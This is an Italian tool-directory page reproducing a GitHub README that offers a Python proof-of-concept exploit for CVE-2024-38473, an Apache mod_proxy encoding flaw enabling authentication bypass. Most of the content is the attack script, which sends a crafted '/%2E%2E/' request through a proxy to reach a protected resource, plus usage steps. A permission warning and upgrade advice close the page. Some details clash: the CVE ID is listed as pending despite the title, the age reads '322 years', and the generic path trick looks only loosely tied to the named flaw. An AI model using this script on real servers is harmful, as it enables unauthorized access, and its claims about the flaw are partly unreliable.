Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-38473 — Script proof-of-concept che dimostrano una vulnerabilità di codifica in Apache HTTP Server mod_proxy (CVE-2024-38473) che permette il bypass dell'autenticazione tramite URL di richiesta appositamente modificati ai servizi backend. | Kitploit
Strumenti/GitHubGitHub/abdurahmon3236/cve-2024-38473
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Script proof-of-concept che dimostrano una vulnerabilità di codifica in Apache HTTP Server mod_proxy (CVE-2024-38473) che permette il bypass dell'autenticazione tramite URL di richiesta appositamente modificati ai servizi backend.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
322 anni faNon ancora revisionato

Proof of Concept (PoC) per il problema di codifica nel modulo mod_proxy di Apache HTTP Server

Questo repository contiene script Proof of Concept (PoC) per dimostrare un problema di codifica nel modulo mod_proxy di Apache HTTP Server versioni 2.4.59 e precedenti. Questa vulnerabilità consente di inviare URL di richiesta con codifica errata ai servizi backend, bypassando potenzialmente l'autenticazione tramite richieste appositamente create.

Table of Contents

  • Descrizione della vulnerabilità
  • Configurazione e utilizzo
  • Considerazioni importanti
  • Mitigazione

Descrizione della vulnerabilità

CVE-ID: (In attesa)

Panoramica: Un problema di codifica nel modulo mod_proxy di Apache HTTP Server versioni 2.4.59 e precedenti consente di inviare URL di richiesta con codifica errata ai servizi backend. Ciò può potenzialmente bypassare i meccanismi di autenticazione tramite richieste appositamente create. Si consiglia di aggiornare alla versione 2.4.60, che risolve questo problema.

Versioni interessate:

  • Apache HTTP Server 2.4.59 e precedenti

Versione corretta:

  • Apache HTTP Server 2.4.60

Configurazione e utilizzo

Prerequisiti

  • Python 3.x
  • libreria requests (pip install requests)

Dimostrazione della vulnerabilità

  1. Identificare il servizio backend:

    • Si supponga che il servizio backend si trovi all'indirizzo http://backend-service.example.com.
  2. Creare una richiesta dannosa:

    • La richiesta dannosa utilizzerà una codifica errata per bypassare l'autenticazione.
  3. Eseguire lo script PoC:

    • Salvare il seguente script come mod_proxy_poc.py ed eseguirlo.

Script PoC

Ecco uno script Python che dimostra la vulnerabilità:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

Spiegazione

  1. Configurazione:

    • proxy_url: L'URL del server proxy.
    • backend_service_path: Il percorso della risorsa protetta nel servizio backend.
    • malicious_path: Il percorso con codifica errata per bypassare l'autenticazione.
  2. send_malicious_request:

    • Costruisce un URL dannoso con il percorso codificato in modo errato.
    • Invia una richiesta GET al server proxy con l'URL dannoso.
    • Stampa i dettagli della risposta per verificare se l'autenticazione è stata bypassata.

Considerazioni importanti

  • Autorizzazioni: Assicurati di avere il permesso esplicito di testare questa vulnerabilità sul sistema target. L'accesso non autorizzato è illegale e non etico.
  • Ambiente di test: Esegui questo test in un ambiente controllato per evitare di influenzare i sistemi di produzione.

Mitigazione

Per mitigare questa vulnerabilità, aggiorna ad Apache HTTP Server versione 2.4.60, che risolve il problema di codifica nel modulo mod_proxy.

  • Istruzioni per l'aggiornamento:
    • Segui la documentazione ufficiale di Apache HTTP Server per scaricare e installare l'ultima versione.

Mantenendo il software aggiornato e seguendo le migliori pratiche di sicurezza, è possibile prevenire vulnerabilità come questo problema di codifica nel modulo mod_proxy.

Scarica lo strumento